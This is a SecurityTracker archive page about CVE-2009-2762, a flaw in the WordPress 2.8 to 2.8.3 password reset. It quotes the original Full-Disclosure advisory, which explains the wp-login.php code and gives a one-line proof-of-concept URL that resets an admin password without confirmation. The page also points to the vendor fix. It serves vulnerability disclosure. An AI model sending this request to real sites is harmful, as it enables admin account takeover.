SecurityTracker.com
    Home    |    View Topics    |    Search    |    Contact Us    |   

SecurityTracker
Archives


 


Category:   Application (Forum/Board/Portal)  >   WordPress Vendors:   wordpress.org
WordPress Input Validation Bug Lets Remote Users Reset the Administrative Password
SecurityTracker Alert ID:  1022707
SecurityTracker URL:  http://securitytracker.com/id/1022707
CVE Reference:   CVE-2009-2762   (Links to External Site)
Updated:  Aug 15 2009
Original Entry Date:  Aug 11 2009
Impact:   Modification of authentication information, User access via network
Fix Available:  Yes  Vendor Confirmed:  Yes  Exploit Included:  Yes  
Version(s): 2.8 - 2.8.3
Description:   A vulnerability was reported in WordPress. A remote user can reset the administrative password.

A remote user can send an empty array for the activation 'key' parameter to the 'wp-login.php' script to cause the specified account's password to be reset without confirmation.

A demonstration exploit is provided:

http://[target]/wp-login.php?action=rp&key[]=

Laurent Gaffie reported this vulnerability.

Impact:   A remote user can reset the administrative password.
Solution:   The vendor has issued a source code fix, available at:

http://core.trac.wordpress.org/changeset/11798

Vendor URL:  www.wordpress.org/ (Links to External Site)
Cause:   Input validation error
Underlying OS:  Linux (Any), UNIX (Any), Windows (Any)

Message History:   None.


 Source Message Contents

Subject:  [Full-disclosure] WordPress <= 2.8.3 Remote admin reset password

--===============1183897117==
Content-Type: multipart/alternative; boundary=0016364ef4d6fd0ac50470d431d8

--0016364ef4d6fd0ac50470d431d8
Content-Type: text/plain; charset=ISO-8859-1
Content-Transfer-Encoding: quoted-printable

=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=
=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D
- Release date: August 10th, 2009
- Discovered by: Laurent Gaffi=E9
- Severity: Medium
=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=
=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D

I. VULNERABILITY
-------------------------
WordPress <=3D 2.8.3 Remote admin reset password

II. BACKGROUND
-------------------------
WordPress is a state-of-the-art publishing platform with a focus on
aesthetics, web standards, and usability.
WordPress is both free and priceless at the same time.
More simply, WordPress is what you use when you want to work with your
blogging software, not fight it.

III. DESCRIPTION
-------------------------
The way Wordpress handle a password reset looks like this:
You submit your email adress or username via this form
/wp-login.php?action=3Dlostpassword ;
Wordpress send you a reset confirmation like that via email:

"
Someone has asked to reset the password for the following site and username=
.
http://DOMAIN_NAME.TLD/wordpress
Username: admin
To reset your password visit the following address, otherwise just ignore
this email and nothing will happen

http://DOMAIN_NAME.TLD/wordpress/wp-login.php?action=3Drp&key=3Do7naCKN3Ooe=
U2KJMMsag
"

You click on the link, and then Wordpress reset your admin password, and
sends you over another email with your new credentials.

Let's see how it works:


wp-login.php:
...[snip]....
line 186:
function reset_password($key) {
    global $wpdb;

    $key =3D preg_replace('/[^a-z0-9]/i', '', $key);

    if ( empty( $key ) )
        return new WP_Error('invalid_key', __('Invalid key'));

    $user =3D $wpdb->get_row($wpdb->prepare("SELECT * FROM $wpdb->users WHE=
RE
user_activation_key =3D %s", $key));
    if ( empty( $user ) )
        return new WP_Error('invalid_key', __('Invalid key'));
...[snip]....
line 276:
$action =3D isset($_REQUEST['action']) ? $_REQUEST['action'] : 'login';
$errors =3D new WP_Error();

if ( isset($_GET['key']) )
    $action =3D 'resetpass';

// validate action so as to default to the login screen
if ( !in_array($action, array('logout', 'lostpassword', 'retrievepassword',
'resetpass', 'rp', 'register', 'login')) && false =3D=3D=3D
has_filter('login_form_' . $action) )
    $action =3D 'login';
...[snip]....

line 370:

break;

case 'resetpass' :
case 'rp' :
    $errors =3D reset_password($_GET['key']);

    if ( ! is_wp_error($errors) ) {
        wp_redirect('wp-login.php?checkemail=3Dnewpass');
        exit();
    }

    wp_redirect('wp-login.php?action=3Dlostpassword&error=3Dinvalidkey');
    exit();

break;
...[snip ]...

You can abuse the password reset function, and bypass the first step and
then reset the admin password by submiting an array to the $key variable.


IV. PROOF OF CONCEPT
-------------------------
A web browser is sufficiant to reproduce this Proof of concept:
http://DOMAIN_NAME.TLD/wp-login.php?action=3Drp&key[]=3D
The password will be reset without any confirmation.

V. BUSINESS IMPACT
-------------------------
An attacker could exploit this vulnerability to compromise the admin accoun=
t
of any wordpress/wordpress-mu <=3D 2.8.3

VI. SYSTEMS AFFECTED
-------------------------
All

VII. SOLUTION
-------------------------
No patch aviable for the moment.

VIII. REFERENCES
-------------------------
http://www.wordpress.org

IX. CREDITS
-------------------------
This vulnerability has been discovered by Laurent Gaffi=E9
Laurent.gaffie{remove-this}(at)gmail.com
I'd like to shoot some greetz to securityreason.com for them great research
on PHP, as for this under-estimated vulnerability discovered by Maksymilian
Arciemowicz :
http://securityreason.com/achievement_securityalert/38

X. REVISION HISTORY
-------------------------
August 10th, 2009: Initial release

XI. LEGAL NOTICES
-------------------------
The information contained within this advisory is supplied "as-is"
with no warranties or guarantees of fitness of use or otherwise.
I accept no responsibility for any damage caused by the use or
misuse of this information.

--0016364ef4d6fd0ac50470d431d8
Content-Type: text/html; charset=ISO-8859-1
Content-Transfer-Encoding: quoted-printable

=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=
=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D<br>- Release d=
ate: August 10th, 2009<br>- Discovered by: Laurent Gaffi=E9<br>- Severity: =
Medium<br>=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=
=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D<br=
><br>I. VULNERABILITY<br>-------------------------<br>
WordPress &lt;=3D 2.8.3 Remote admin reset password<br><br>II. BACKGROUND<b=
r>-------------------------<br>WordPress is a state-of-the-art publishing p=
latform with a focus on aesthetics, web standards, and usability. <br>WordP=
ress is both free and priceless at the same time.<br>
More simply, WordPress is what you use when you want to work with your blog=
ging software, not fight it.<br><br>III. DESCRIPTION<br>-------------------=
------<br>The way Wordpress handle a password reset looks like this:<br>
You submit your email adress or username via this form /wp-login.php?action=
=3Dlostpassword ;<br>Wordpress send you a reset confirmation like that via =
email:<br><br>&quot;<br>Someone has asked to reset the password for the fol=
lowing site and username.<br>
<a href=3D"http://DOMAIN_NAME.TLD/wordpress">http://DOMAIN_NAME.TLD/wordpre=
ss</a><br>Username: admin<br>To reset your password visit the following add=
ress, otherwise just ignore this email and nothing will happen<br><br><a hr=
ef=3D"http://DOMAIN_NAME.TLD/wordpress/wp-login.php?action=3Drp&amp;key=3Do=
7naCKN3OoeU2KJMMsag">http://DOMAIN_NAME.TLD/wordpress/wp-login.php?action=
=3Drp&amp;key=3Do7naCKN3OoeU2KJMMsag</a><br>
&quot;<br><br>You click on the link, and then Wordpress reset your admin pa=
ssword, and sends you over another email with your new credentials.<br><br>=
Let&#39;s see how it works:<br><br><br>wp-login.php:<br>...[snip]....<br>
line 186:<br>function reset_password($key) {<br>=A0=A0=A0 global $wpdb;<br>=
<br>=A0=A0=A0 $key =3D preg_replace(&#39;/[^a-z0-9]/i&#39;, &#39;&#39;, $ke=
y);<br><br>=A0=A0=A0 if ( empty( $key ) )<br>=A0=A0=A0 =A0=A0=A0 return new=
 WP_Error(&#39;invalid_key&#39;, __(&#39;Invalid key&#39;));<br>
<br>=A0=A0=A0 $user =3D $wpdb-&gt;get_row($wpdb-&gt;prepare(&quot;SELECT * =
FROM $wpdb-&gt;users WHERE user_activation_key =3D %s&quot;, $key));<br>=A0=
=A0=A0 if ( empty( $user ) )<br>=A0=A0=A0 =A0=A0=A0 return new WP_Error(&#3=
9;invalid_key&#39;, __(&#39;Invalid key&#39;));<br>
...[snip]....<br>line 276:<br>$action =3D isset($_REQUEST[&#39;action&#39;]=
) ? $_REQUEST[&#39;action&#39;] : &#39;login&#39;;<br>$errors =3D new WP_Er=
ror();<br><br>if ( isset($_GET[&#39;key&#39;]) )<br>=A0=A0=A0 $action =3D &=
#39;resetpass&#39;;<br>
<br>// validate action so as to default to the login screen<br>if ( !in_arr=
ay($action, array(&#39;logout&#39;, &#39;lostpassword&#39;, &#39;retrievepa=
ssword&#39;, &#39;resetpass&#39;, &#39;rp&#39;, &#39;register&#39;, &#39;lo=
gin&#39;)) &amp;&amp; false =3D=3D=3D has_filter(&#39;login_form_&#39; . $a=
ction) )<br>
=A0=A0=A0 $action =3D &#39;login&#39;;<br>...[snip]....<br><br>line 370:<br=
><br>break;<br><br>case &#39;resetpass&#39; :<br>case &#39;rp&#39; :<br>=A0=
=A0=A0 $errors =3D reset_password($_GET[&#39;key&#39;]);<br><br>=A0=A0=A0 i=
f ( ! is_wp_error($errors) ) {<br>
=A0=A0=A0 =A0=A0=A0 wp_redirect(&#39;wp-login.php?checkemail=3Dnewpass&#39;=
);<br>=A0=A0=A0 =A0=A0=A0 exit();<br>=A0=A0=A0 }<br><br>=A0=A0=A0 wp_redire=
ct(&#39;wp-login.php?action=3Dlostpassword&amp;error=3Dinvalidkey&#39;);<br=
>=A0=A0=A0 exit();<br><br>break;<br>...[snip=A0]...<br>
<br>You can abuse the password reset function, and bypass the first step an=
d then reset the admin password by submiting an array to the $key variable.=
<br>=A0<br><br>IV. PROOF OF CONCEPT<br>-------------------------<br>A web b=
rowser is sufficiant to reproduce this Proof of concept:<br>
<a href=3D"http://DOMAIN_NAME.TLD/wp-login.php?action=3Drp&amp;key[]=3D">ht=
tp://DOMAIN_NAME.TLD/wp-login.php?action=3Drp&amp;key[]=3D</a><br>The passw=
ord will be reset without any confirmation.<br>=A0<br>V. BUSINESS IMPACT<br=
>-------------------------<br>
An attacker could exploit this vulnerability to compromise the admin accoun=
t of any wordpress/wordpress-mu &lt;=3D 2.8.3<br><br>VI. SYSTEMS AFFECTED<b=
r>-------------------------<br>All<br><br>VII. SOLUTION<br>----------------=
---------<br>
No patch aviable for the moment.<br>=A0<br>VIII. REFERENCES<br>------------=
-------------<br><a href=3D"http://www.wordpress.org">http://www.wordpress.=
org</a><br><br>IX. CREDITS<br>-------------------------<br>This vulnerabili=
ty has been discovered by Laurent Gaffi=E9<br>
Laurent.gaffie{remove-this}(at)<a href=3D"http://gmail.com">gmail.com</a><b=
r>I&#39;d like to shoot some greetz to <a href=3D"http://securityreason.com=
">securityreason.com</a> for them great research on PHP, as for this under-=
estimated vulnerability discovered by Maksymilian Arciemowicz :<br>
<a href=3D"http://securityreason.com/achievement_securityalert/38">http://s=
ecurityreason.com/achievement_securityalert/38</a><br><br>X. REVISION HISTO=
RY<br>-------------------------<br>August 10th, 2009: Initial release<br>
<br>XI. LEGAL NOTICES<br>-------------------------<br>The information conta=
ined within this advisory is supplied &quot;as-is&quot;<br>with no warranti=
es or guarantees of fitness of use or otherwise.<br>I accept no responsibil=
ity for any damage caused by the use or <br>
misuse of this information.<br>

--0016364ef4d6fd0ac50470d431d8--


--===============1183897117==
Content-Type: text/plain; charset="us-ascii"
MIME-Version: 1.0
Content-Transfer-Encoding: 7bit
Content-Disposition: inline

_______________________________________________
Full-Disclosure - We believe in it.
Charter: http://lists.grok.org.uk/full-disclosure-charter.html
Hosted and sponsored by Secunia - http://secunia.com/
--===============1183897117==--

 
 


Go to the Top of This SecurityTracker Archive Page





Home   |    View Topics   |    Search   |    Contact Us

This web site uses cookies for web analytics. Learn More

Copyright 2019, SecurityGlobal.net LLC